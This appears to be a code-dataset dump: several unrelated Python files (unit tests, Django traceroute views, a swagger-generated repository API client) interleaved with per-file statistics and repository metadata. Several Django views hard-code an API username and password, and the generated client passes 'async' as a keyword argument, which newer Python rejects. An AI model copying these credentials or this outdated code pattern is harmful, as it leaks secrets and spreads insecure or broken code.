def test_upack2_ascii(self):
result = b'\x1d\x00\x00abcdefghijklmnopqrstuvwxyz\xd6\xc4\xdc'
ustr = upack2(u"abcdefghijklmnopqrstuvwxyzÖÄÜ")
self.assertEqual(ustr, result)
def test_upack2_latin1(self):
result = b'\x1d\x00\x00abcdefghijklmnopqrstuvwxyz\xd6\xc4\xdc'
ustr = upack2(u"abcdefghijklmnopqrstuvwxyzÖÄÜ", encoding='latin1')
self.assertEqual(ustr, result)
def test_upack2_cp1251(self):
result = b'\x1d\x00\x00abcdefghijklmnopqrstuvwxyz\xce\xeb\xff'
ustr = upack2(u"abcdefghijklmnopqrstuvwxyz\xce\xeb\xff", encoding='cp1251')
self.assertEqual(ustr, result)
def test_unicode(self):
chr_ = chr if (sys.version_info[0] >= 3) else unichr
result = b'\x00\x02\x01\x00\x00\x01\x00\x02\x00\x03\x00\x04\x00\x05\x00\x06\x00\x07\x00\x08\x00\t\x00\n\x00\x0b\x00\x0c\x00\r\x00\x0e\x00\x0f\x00\x10\x00\x11\x00\x12\x00\x13\x00\x14\x00\x15\x00\x16\x00\x17\x00\x18\x00\x19\x00\x1a\x00\x1b\x00\x1c\x00\x1d\x00\x1e\x00\x1f\x00 \x00!\x00"\x00#\x00$\x00%\x00&\x00\'\x00(\x00)\x00*\x00+\x00,\x00-\x00.\x00/\x000\x001\x002\x003\x004\x005\x006\x007\x008\x009\x00:\x00;\x00<\x00=\x00>\x00?\x00@\x00A\x00B\x00C\x00D\x00E\x00F\x00G\x00H\x00I\x00J\x00K\x00L\x00M\x00N\x00O\x00P\x00Q\x00R\x00S\x00T\x00U\x00V\x00W\x00X\x00Y\x00Z\x00[\x00\\\x00]\x00^\x00_\x00`\x00a\x00b\x00c\x00d\x00e\x00f\x00g\x00h\x00i\x00j\x00k\x00l\x00m\x00n\x00o\x00p\x00q\x00r\x00s\x00t\x00u\x00v\x00w\x00x\x00y\x00z\x00{\x00|\x00}\x00~\x00\x7f\x00\x80\x00\x81\x00\x82\x00\x83\x00\x84\x00\x85\x00\x86\x00\x87\x00\x88\x00\x89\x00\x8a\x00\x8b\x00\x8c\x00\x8d\x00\x8e\x00\x8f\x00\x90\x00\x91\x00\x92\x00\x93\x00\x94\x00\x95\x00\x96\x00\x97\x00\x98\x00\x99\x00\x9a\x00\x9b\x00\x9c\x00\x9d\x00\x9e\x00\x9f\x00\xa0\x00\xa1\x00\xa2\x00\xa3\x00\xa4\x00\xa5\x00\xa6\x00\xa7\x00\xa8\x00\xa9\x00\xaa\x00\xab\x00\xac\x00\xad\x00\xae\x00\xaf\x00\xb0\x00\xb1\x00\xb2\x00\xb3\x00\xb4\x00\xb5\x00\xb6\x00\xb7\x00\xb8\x00\xb9\x00\xba\x00\xbb\x00\xbc\x00\xbd\x00\xbe\x00\xbf\x00\xc0\x00\xc1\x00\xc2\x00\xc3\x00\xc4\x00\xc5\x00\xc6\x00\xc7\x00\xc8\x00\xc9\x00\xca\x00\xcb\x00\xcc\x00\xcd\x00\xce\x00\xcf\x00\xd0\x00\xd1\x00\xd2\x00\xd3\x00\xd4\x00\xd5\x00\xd6\x00\xd7\x00\xd8\x00\xd9\x00\xda\x00\xdb\x00\xdc\x00\xdd\x00\xde\x00\xdf\x00\xe0\x00\xe1\x00\xe2\x00\xe3\x00\xe4\x00\xe5\x00\xe6\x00\xe7\x00\xe8\x00\xe9\x00\xea\x00\xeb\x00\xec\x00\xed\x00\xee\x00\xef\x00\xf0\x00\xf1\x00\xf2\x00\xf3\x00\xf4\x00\xf5\x00\xf6\x00\xf7\x00\xf8\x00\xf9\x00\xfa\x00\xfb\x00\xfc\x00\xfd\x00\xfe\x00\xff\x00\x00\x01\x01\x01\x02\x01\x03\x01\x04\x01\x05\x01\x06\x01\x07\x01\x08\x01\t\x01\n\x01\x0b\x01\x0c\x01\r\x01\x0e\x01\x0f\x01\x10\x01\x11\x01\x12\x01\x13\x01\x14\x01\x15\x01\x16\x01\x17\x01\x18\x01\x19\x01\x1a\x01\x1b\x01\x1c\x01\x1d\x01\x1e\x01\x1f\x01 \x01!\x01"\x01#\x01$\x01%\x01&\x01\'\x01(\x01)\x01*\x01+\x01,\x01-\x01.\x01/\x010\x011\x012\x013\x014\x015\x016\x017\x018\x019\x01:\x01;\x01<\x01=\x01>\x01?\x01@\x01A\x01B\x01C\x01D\x01E\x01F\x01G\x01H\x01I\x01J\x01K\x01L\x01M\x01N\x01O\x01P\x01Q\x01R\x01S\x01T\x01U\x01V\x01W\x01X\x01Y\x01Z\x01[\x01\\\x01]\x01^\x01_\x01`\x01a\x01b\x01c\x01d\x01e\x01f\x01g\x01h\x01i\x01j\x01k\x01l\x01m\x01n\x01o\x01p\x01q\x01r\x01s\x01t\x01u\x01v\x01w\x01x\x01y\x01z\x01{\x01|\x01}\x01~\x01\x7f\x01\x80\x01\x81\x01\x82\x01\x83\x01\x84\x01\x85\x01\x86\x01\x87\x01\x88\x01\x89\x01\x8a\x01\x8b\x01\x8c\x01\x8d\x01\x8e\x01\x8f\x01\x90\x01\x91\x01\x92\x01\x93\x01\x94\x01\x95\x01\x96\x01\x97\x01\x98\x01\x99\x01\x9a\x01\x9b\x01\x9c\x01\x9d\x01\x9e\x01\x9f\x01\xa0\x01\xa1\x01\xa2\x01\xa3\x01\xa4\x01\xa5\x01\xa6\x01\xa7\x01\xa8\x01\xa9\x01\xaa\x01\xab\x01\xac\x01\xad\x01\xae\x01\xaf\x01\xb0\x01\xb1\x01\xb2\x01\xb3\x01\xb4\x01\xb5\x01\xb6\x01\xb7\x01\xb8\x01\xb9\x01\xba\x01\xbb\x01\xbc\x01\xbd\x01\xbe\x01\xbf\x01\xc0\x01\xc1\x01\xc2\x01\xc3\x01\xc4\x01\xc5\x01\xc6\x01\xc7\x01\xc8\x01\xc9\x01\xca\x01\xcb\x01\xcc\x01\xcd\x01\xce\x01\xcf\x01\xd0\x01\xd1\x01\xd2\x01\xd3\x01\xd4\x01\xd5\x01\xd6\x01\xd7\x01\xd8\x01\xd9\x01\xda\x01\xdb\x01\xdc\x01\xdd\x01\xde\x01\xdf\x01\xe0\x01\xe1\x01\xe2\x01\xe3\x01\xe4\x01\xe5\x01\xe6\x01\xe7\x01\xe8\x01\xe9\x01\xea\x01\xeb\x01\xec\x01\xed\x01\xee\x01\xef\x01\xf0\x01\xf1\x01\xf2\x01\xf3\x01\xf4\x01\xf5\x01\xf6\x01\xf7\x01\xf8\x01\xf9\x01\xfa\x01\xfb\x01\xfc\x01\xfd\x01\xfe\x01\xff\x01'
unicodestring = ''.join( [chr_(i) for i in range(0x200)])
self.assertEqual(result, upack2(unicodestring))
def test_upack2rt(self):
result = b'\x06\x00\x09\x01\x00a\x00b\x00c\x00\x91\x03\x92\x03\x93\x03', b'\x00\x00\x0C\x00'
self.assertEqual(result, upack2rt([(u'abcΑΒΓ', 12)]))
| 129.736842
| 3,550
| 0.726978
| 1,006
| 4,930
| 3.548708
| 0.280318
| 0.055462
| 0.068067
| 0.07395
| 0.30084
| 0.289076
| 0.267227
| 0.254902
| 0.254902
| 0.22521
| 0
| 0.313961
| 0.054158
| 4,930
| 37
| 3,551
| 133.243243
| 0.451641
| 0.002434
| 0
| 0.214286
| 0
| 0.107143
| 0.444264
| 0.437144
| 0
| 1
| 0.001017
| 0
| 0.214286
| 1
| 0.214286
| false
| 0
| 0.107143
| 0
| 0.357143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
297f81e0a5ce5ff74ab6d3164d24f781a7df2e8f
| 200
|
py
|
Python
|
test/test_fuzzy_game.py
|
xfuzzycomp/FuzzyAsteroids
|
636707499b4689bdecd8af32231c3ffd43f6583b
|
[
"MIT"
] | 1
|
2021-09-14T20:38:08.000Z
|
2021-09-14T20:38:08.000Z
|
test/test_fuzzy_game.py
|
xfuzzycomp/FuzzyAsteroids
|
636707499b4689bdecd8af32231c3ffd43f6583b
|
[
"MIT"
] | null | null | null |
test/test_fuzzy_game.py
|
xfuzzycomp/FuzzyAsteroids
|
636707499b4689bdecd8af32231c3ffd43f6583b
|
[
"MIT"
] | null | null | null |
from unittest import TestCase
from src.fuzzy_asteroids.fuzzy_controller import *
from src.fuzzy_asteroids.fuzzy_asteroids import FuzzyAsteroidGame, Scenario
class TestFuzzyGame(TestCase):
pass
| 22.222222
| 75
| 0.84
| 24
| 200
| 6.833333
| 0.541667
| 0.256098
| 0.146341
| 0.256098
| 0.317073
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.115
| 200
| 8
| 76
| 25
| 0.926554
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.2
| 0.6
| 0
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
|
0
| 7
|
468377cd18e71597a5421f1a0ebc1f1bd2581277
| 1,023
|
py
|
Python
|
tests/test_optimizers/_parametrize.py
|
PartiallyTyped/Hyperactive
|
99d4f6416cf724d5dbe797c2a1a1f9ae22e7d482
|
[
"MIT"
] | 382
|
2019-07-16T13:30:15.000Z
|
2022-03-30T22:29:07.000Z
|
tests/test_optimizers/_parametrize.py
|
PartiallyTyped/Hyperactive
|
99d4f6416cf724d5dbe797c2a1a1f9ae22e7d482
|
[
"MIT"
] | 46
|
2019-08-27T18:07:47.000Z
|
2022-03-16T16:28:10.000Z
|
tests/test_optimizers/_parametrize.py
|
PartiallyTyped/Hyperactive
|
99d4f6416cf724d5dbe797c2a1a1f9ae22e7d482
|
[
"MIT"
] | 35
|
2019-08-03T00:51:09.000Z
|
2021-12-03T19:06:07.000Z
|
from hyperactive import (
HillClimbingOptimizer,
StochasticHillClimbingOptimizer,
RepulsingHillClimbingOptimizer,
RandomSearchOptimizer,
RandomRestartHillClimbingOptimizer,
RandomAnnealingOptimizer,
SimulatedAnnealingOptimizer,
ParallelTemperingOptimizer,
ParticleSwarmOptimizer,
EvolutionStrategyOptimizer,
BayesianOptimizer,
TreeStructuredParzenEstimators,
DecisionTreeOptimizer,
EnsembleOptimizer,
)
optimizers = (
"Optimizer",
[
(HillClimbingOptimizer),
(StochasticHillClimbingOptimizer),
(RepulsingHillClimbingOptimizer),
(RandomSearchOptimizer),
(RandomRestartHillClimbingOptimizer),
(RandomAnnealingOptimizer),
(SimulatedAnnealingOptimizer),
(ParallelTemperingOptimizer),
(ParticleSwarmOptimizer),
(EvolutionStrategyOptimizer),
(BayesianOptimizer),
(TreeStructuredParzenEstimators),
(DecisionTreeOptimizer),
(EnsembleOptimizer),
],
)
| 26.921053
| 45
| 0.717498
| 33
| 1,023
| 22.242424
| 0.575758
| 0.141689
| 0.223433
| 0.280654
| 0.945504
| 0.945504
| 0.945504
| 0.945504
| 0.945504
| 0.945504
| 0
| 0
| 0.217009
| 1,023
| 37
| 46
| 27.648649
| 0.916355
| 0
| 0
| 0
| 0
| 0
| 0.008798
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.028571
| 0
| 0.028571
| 0
| 0
| 0
| 1
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
46934f93a99993a4a8a8ae8f292421d6f3837197
| 10,645
|
py
|
Python
|
bootcamp/traceroute/views.py
|
davismathew/netbot-django
|
5a46368ba7c16790e1b96292eecfde6f8f35d2e5
|
[
"MIT"
] | null | null | null |
bootcamp/traceroute/views.py
|
davismathew/netbot-django
|
5a46368ba7c16790e1b96292eecfde6f8f35d2e5
|
[
"MIT"
] | null | null | null |
bootcamp/traceroute/views.py
|
davismathew/netbot-django
|
5a46368ba7c16790e1b96292eecfde6f8f35d2e5
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render, redirect, get_object_or_404
from django.http import HttpResponseBadRequest, HttpResponse
from bootcamp.tasks.models import Task
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from bootcamp.tasks.forms import TaskForm
from django.contrib.auth.decorators import login_required
from bootcamp.decorators import ajax_required
import markdown
from django.template.loader import render_to_string
import requests,json
from bootcamp.utils.loadconfig import get_vars
def getvrflist(network):
if network.lower() == 'emc'.lower():
filename = '/etc/netbot/emcvrflist.txt'
elif network.lower() == 'mtn'.lower():
filename = '/etc/netbot/mtnvrflist.txt'
vrfnames = []
with open(filename) as f:
for line in f:
vrfnames.append(line)
return vrfnames
@login_required
def traceroute(request):
# task = get_object_or_404(Task, status=Task.ACTIVE)
emcvrfname=getvrflist('emc')
return render(request, 'traceroute/traceroute.html', {'task': "task", 'emcvrf':emcvrfname,'message':""})
@login_required
def inttraceroute(request):
# task = get_object_or_404(Task, status=Task.ACTIVE)
emcvrfname=getvrflist('emc')
return render(request, 'traceroute/inttraceroute.html', {'task': "task", 'emcvrf':emcvrfname,'message':""})
@login_required()
def runtrace(request):
sourceip = request.POST.get('sourceip')
destip = request.POST.get('destip')
vrf = request.POST.get('vrf')
network = request.POST.get('network')
vrfname = request.POST.get('vrfname')
baseurl = get_vars('ansibengineemc')
emcvrfname=getvrflist('emc')
if sourceip == '' or destip == '' or vrf == '' or vrfname == '' or network == '':
return render(request, 'traceroute/traceroute.html', {'task': "task", 'emcvrf':emcvrfname,'message':"Please fill in all the details!!"})
if str(network).lower() == 'EMC'.lower():
baseurl = get_vars('ansibengineemc')
else:
baseurl = get_vars('ansibenginemtn')
if vrf == 'True':
vrf="True"
else:
vrf="False"
return render(request, 'traceroute/runtraceroute.html', {'sourceip': sourceip, 'destip':destip,'vrfname': vrfname, 'vrf':vrf,'baseurl':baseurl})
@login_required()
def runtraceapi(request):
sourceip = request.POST.get('sourceip')
destip = request.POST.get('destip')
vrf = request.POST.get('vrf')
vrfname = request.POST.get('vrfname')
baseurl = request.POST.get('baseurl')
url = baseurl+'/ansibengine/api/v1.0/runtrace'
headers = {'content-type': 'application/json'}
temp= {}
data= {}
data['sourceip']=sourceip
data['destip']=destip
data['vrfname']=vrfname
if vrf == 'True':
data['vrf']="True"
else:
data['vrf']="False"
try:
response = requests.post(url, data=json.dumps(data), headers=headers, auth=('netbot','N#tB@t'))
if not response.status_code == 201 :
temp['value']="Error!! Unexpected response. Please report this"
return HttpResponse(json.dumps(temp), content_type = "application/json")
except requests.exceptions.RequestException as e:
# return "Error: {}".format(e)
temp['value']="Error connecting to API. Please report this"
return HttpResponse(json.dumps(temp), content_type = "application/json")
return HttpResponse(response.text, content_type = "application/json")
@login_required()
def runinterfacetrace(request):
routerip = request.POST.get('sourceip')
interfaceip = request.POST.get('sourceint')
destip = request.POST.get('destip')
vrf = request.POST.get('vrf')
network = request.POST.get('network')
vrfname = request.POST.get('vrfdropdown')
baseurl = get_vars('ansibengineemc')
emcvrfname=getvrflist('emc')
if routerip == '' or interfaceip == '' or destip == '' or vrf == '' or vrfname == '' or network == '':
return render(request, 'traceroute/inttraceroute.html', {'task': "task", 'emcvrf':emcvrfname,'message':"Please fill in all the details!!"})
if str(network).lower() == 'EMC'.lower():
baseurl = get_vars('ansibengineemc')
else:
baseurl = get_vars('ansibenginemtn')
if vrf == 'True':
vrf="True"
else:
vrf="False"
return render(request, 'traceroute/runinterfacetraceroute.html', {'routerip': routerip, 'interfaceip':interfaceip, 'destip':destip,'vrfname': vrfname, 'vrf':vrf,'baseurl':baseurl})
@login_required()
def runinterfacetraceapi(request):
routerip = request.POST.get('routerip')
interfaceip = request.POST.get('interfaceip')
destip = request.POST.get('destip')
vrf = request.POST.get('vrf')
vrfname = request.POST.get('vrfname')
baseurl = request.POST.get('baseurl')
url = baseurl+'/ansibengine/api/v1.0/runinterfacetrace'
headers = {'content-type': 'application/json'}
temp= {}
data= {}
data['routerip']=routerip
data['interfaceip']=interfaceip
data['destip']=destip
data['vrfname']=vrfname
if vrf == 'True':
data['vrf']="True"
else:
data['vrf']="False"
try:
response = requests.post(url, data=json.dumps(data), headers=headers, auth=('netbot','N#tB@t'))
if not response.status_code == 201 :
temp['value']="Error!! Unexpected response. Please report this"
return HttpResponse(json.dumps(temp), content_type = "application/json")
except requests.exceptions.RequestException as e:
# return "Error: {}".format(e)
temp['value']="Error connecting to API. Please report this"
return HttpResponse(json.dumps(temp), content_type = "application/json")
return HttpResponse(response.text, content_type = "application/json")
##deprecated method
@login_required()
def gettraceroute(request):
sourceip = request.POST.get('sourceip')
destip = request.POST.get('destip')
vrf = request.POST.get('vrf')
network = request.POST.get('network')
vrfname = request.POST.get('vrfdropdown')
baseurl = get_vars('ansibengineemc')
if str(network).lower() == 'EMC'.lower():
baseurl = get_vars('ansibengineemc')
else:
baseurl = get_vars('ansibenginemtn')
url = baseurl+'/ansibengine/api/v1.0/gettraceroute'
headers = {'content-type': 'application/json'}
emcvrfname=getvrflist('emc')
if vrf is True:
data= {}
data['sourceip']=sourceip
data['destip']=destip
data['vrf']="True"
data['vrfname']=vrfname
response = requests.post(url, data=json.dumps(data), headers=headers, auth=('netbot','N#tB@t'))
statuscode = response.status_code
if int(statuscode) == 200:
return render(request, 'traceroute/traceroute.html', {'task': "task", 'emcvrf':emcvrfname, 'message':"Another task is running! Please wait.."})
else:
data= {}
data['sourceip']=sourceip
data['destip']=destip
data['vrf']="False"
data['vrfname']=vrfname
response = requests.post(url, data=json.dumps(data), headers=headers, auth=('netbot','N#tB@t'))
statuscode = response.status_code
if int(statuscode) == 200:
return render(request, 'traceroute/traceroute.html', {'task': "task", 'emcvrf':emcvrfname, 'message':"Another task is running! Please wait.."})
return render(request, 'traceroute/runtraceroute.html', {'task': "task",'baseurl':baseurl})
##deprecated method
@login_required()
def getinterfacetraceroute(request):
routerip = request.POST.get('sourceip')
interfaceip = request.POST.get('sourceint')
destip = request.POST.get('destip')
vrf = request.POST.get('vrf')
network = request.POST.get('network')
vrfname = request.POST.get('vrfdropdown')
baseurl = get_vars('ansibengineemc')
if network.lower() == 'EMC'.lower():
baseurl = get_vars('ansibengineemc')
else:
baseurl = get_vars('ansibenginemtn')
url = baseurl+'/ansibengine/api/v1.0/getinterfacetraceroute'
headers = {'content-type': 'application/json'}
emcvrfname=getvrflist('emc')
if vrf is True:
data= {}
data['routerip']=routerip
data['interfaceip']=interfaceip
data['destip']=destip
data['vrf']="True"
data['vrfname']=vrfname
response = requests.post(url, data=json.dumps(data), headers=headers, auth=('netbot','N#tB@t'))
statuscode = response.status_code
if int(statuscode) == 200:
return render(request, 'traceroute/inttraceroute.html', {'task': "task", 'emcvrf':emcvrfname, 'message':"Another task is running! Please wait.."})
else:
data= {}
data['routerip']=routerip
data['interfaceip']=interfaceip
data['destip']=destip
data['vrf']="False"
data['vrfname']=vrfname
response = requests.post(url, data=json.dumps(data), headers=headers, auth=('netbot','N#tB@t'))
statuscode = response.status_code
if int(statuscode) == 200:
return render(request, 'traceroute/inttraceroute.html', {'task': "task", 'emcvrf':emcvrfname, 'message':"Another task is running! Please wait.."})
return render(request, 'traceroute/runinterfacetraceroute.html', {'task': "task",'baseurl':baseurl})
##deprecated method
def runtraceroute(request):
baseurl = get_vars('ansibengineemc')
if request.method == 'POST':
baseurl = request.POST.get('baseurl')
# if request.method == 'POST':
# baseurl = request.POST.get('baseurl')
url = baseurl+'/ansibengine/api/v1.0/runtraceroute'
headers = {'content-type': 'application/json'}
data= {}
data['value']="some"
data['ipath']='new value'
response = requests.post(url, data=json.dumps(data), headers=headers, auth=('netbot','N#tB@t'))
return HttpResponse(response.text, content_type = "application/json")
##deprecated method
def runinterfacetraceroute(request):
baseurl = get_vars('ansibengineemc')
if request.method == 'POST':
baseurl = request.POST.get('baseurl')
# if request.method == 'POST':
# baseurl = request.POST.get('baseurl')
url = baseurl+'/ansibengine/api/v1.0/runinterfacetraceroute'
headers = {'content-type': 'application/json'}
data= {}
data['value']=url
response = requests.post(url, data=json.dumps(data), headers=headers, auth=('netbot','N#tB@t'))
return HttpResponse(response.text, content_type = "application/json")
# task = get_object_or_404(Task, status=Task.ACTIVE)
# return render(request, 'traceroute/runtraceroute.html', {'task': "task"})
| 36.084746
| 184
| 0.654486
| 1,200
| 10,645
| 5.761667
| 0.120833
| 0.058866
| 0.07492
| 0.052647
| 0.84799
| 0.835985
| 0.825571
| 0.815158
| 0.76497
| 0.750217
| 0
| 0.004858
| 0.187788
| 10,645
| 294
| 185
| 36.207483
| 0.794818
| 0.046407
| 0
| 0.761261
| 0
| 0
| 0.244201
| 0.062481
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04955
| false
| 0
| 0.04955
| 0
| 0.193694
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
46a8106832fc86d96aa0c267b77a51219ca8aa64
| 131
|
py
|
Python
|
src/detect-abnormal-temps/enviroment_temperature.py
|
latonaio/detect-abnormal-set-of-temperatures
|
e5cda1156e23f77f0feb16b56e3624807592fafb
|
[
"MIT"
] | 8
|
2021-10-02T02:50:34.000Z
|
2021-11-05T04:34:38.000Z
|
src/detect-abnormal-temps/enviroment_temperature.py
|
latonaio/detect-abnormal-set-of-temperatures
|
e5cda1156e23f77f0feb16b56e3624807592fafb
|
[
"MIT"
] | null | null | null |
src/detect-abnormal-temps/enviroment_temperature.py
|
latonaio/detect-abnormal-set-of-temperatures
|
e5cda1156e23f77f0feb16b56e3624807592fafb
|
[
"MIT"
] | null | null | null |
import random
def get_enviromental_temperature():
#FIXME : get temerature from sensor
return random.randint(20, 25)
| 16.375
| 39
| 0.717557
| 16
| 131
| 5.75
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.038835
| 0.21374
| 131
| 7
| 40
| 18.714286
| 0.854369
| 0.259542
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 8
|
314bae4978630cb75a5b15193e2c56fa0874eaf8
| 38,821
|
py
|
Python
|
lockss_repository/api/collections_api.py
|
lockss/lockss-repository-python
|
3e28121f9beed27d43af57f66b3dc9c339b274d8
|
[
"BSD-3-Clause"
] | null | null | null |
lockss_repository/api/collections_api.py
|
lockss/lockss-repository-python
|
3e28121f9beed27d43af57f66b3dc9c339b274d8
|
[
"BSD-3-Clause"
] | null | null | null |
lockss_repository/api/collections_api.py
|
lockss/lockss-repository-python
|
3e28121f9beed27d43af57f66b3dc9c339b274d8
|
[
"BSD-3-Clause"
] | null | null | null |
# coding: utf-8
"""
LOCKSS Repository Service REST API
API of the LOCKSS RepositoryService for the LAAWS project # noqa: E501
OpenAPI spec version: 1.9
Contact: dlvargas@stanford.edu
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from lockss_repository.api_client import ApiClient
class CollectionsApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def collections_collectionid_artifacts_artifactid_delete(self, collectionid, artifactid, **kwargs): # noqa: E501
"""Remove an artifact from the repository # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.collections_collectionid_artifacts_artifactid_delete(collectionid, artifactid, async=True)
>>> result = thread.get()
:param async bool
:param str collectionid: Collection containing the artifact (required)
:param str artifactid: Identifier of the artifact (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.collections_collectionid_artifacts_artifactid_delete_with_http_info(collectionid, artifactid, **kwargs) # noqa: E501
else:
(data) = self.collections_collectionid_artifacts_artifactid_delete_with_http_info(collectionid, artifactid, **kwargs) # noqa: E501
return data
def collections_collectionid_artifacts_artifactid_delete_with_http_info(self, collectionid, artifactid, **kwargs): # noqa: E501
"""Remove an artifact from the repository # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.collections_collectionid_artifacts_artifactid_delete_with_http_info(collectionid, artifactid, async=True)
>>> result = thread.get()
:param async bool
:param str collectionid: Collection containing the artifact (required)
:param str artifactid: Identifier of the artifact (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['collectionid', 'artifactid'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method collections_collectionid_artifacts_artifactid_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'collectionid' is set
if ('collectionid' not in params or
params['collectionid'] is None):
raise ValueError("Missing the required parameter `collectionid` when calling `collections_collectionid_artifacts_artifactid_delete`") # noqa: E501
# verify the required parameter 'artifactid' is set
if ('artifactid' not in params or
params['artifactid'] is None):
raise ValueError("Missing the required parameter `artifactid` when calling `collections_collectionid_artifacts_artifactid_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'collectionid' in params:
path_params['collectionid'] = params['collectionid'] # noqa: E501
if 'artifactid' in params:
path_params['artifactid'] = params['artifactid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/collections/{collectionid}/artifacts/{artifactid}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def collections_collectionid_artifacts_artifactid_get(self, collectionid, artifactid, **kwargs): # noqa: E501
"""Get artifact content and metadata # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.collections_collectionid_artifacts_artifactid_get(collectionid, artifactid, async=True)
>>> result = thread.get()
:param async bool
:param str collectionid: Collection containing the artifact (required)
:param str artifactid: Identifier of the artifact (required)
:param str accept: Content type to return
:return: StreamingResponseBody
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.collections_collectionid_artifacts_artifactid_get_with_http_info(collectionid, artifactid, **kwargs) # noqa: E501
else:
(data) = self.collections_collectionid_artifacts_artifactid_get_with_http_info(collectionid, artifactid, **kwargs) # noqa: E501
return data
def collections_collectionid_artifacts_artifactid_get_with_http_info(self, collectionid, artifactid, **kwargs): # noqa: E501
"""Get artifact content and metadata # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.collections_collectionid_artifacts_artifactid_get_with_http_info(collectionid, artifactid, async=True)
>>> result = thread.get()
:param async bool
:param str collectionid: Collection containing the artifact (required)
:param str artifactid: Identifier of the artifact (required)
:param str accept: Content type to return
:return: StreamingResponseBody
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['collectionid', 'artifactid', 'accept'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method collections_collectionid_artifacts_artifactid_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'collectionid' is set
if ('collectionid' not in params or
params['collectionid'] is None):
raise ValueError("Missing the required parameter `collectionid` when calling `collections_collectionid_artifacts_artifactid_get`") # noqa: E501
# verify the required parameter 'artifactid' is set
if ('artifactid' not in params or
params['artifactid'] is None):
raise ValueError("Missing the required parameter `artifactid` when calling `collections_collectionid_artifacts_artifactid_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'collectionid' in params:
path_params['collectionid'] = params['collectionid'] # noqa: E501
if 'artifactid' in params:
path_params['artifactid'] = params['artifactid'] # noqa: E501
query_params = []
header_params = {}
if 'accept' in params:
header_params['Accept'] = params['accept'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
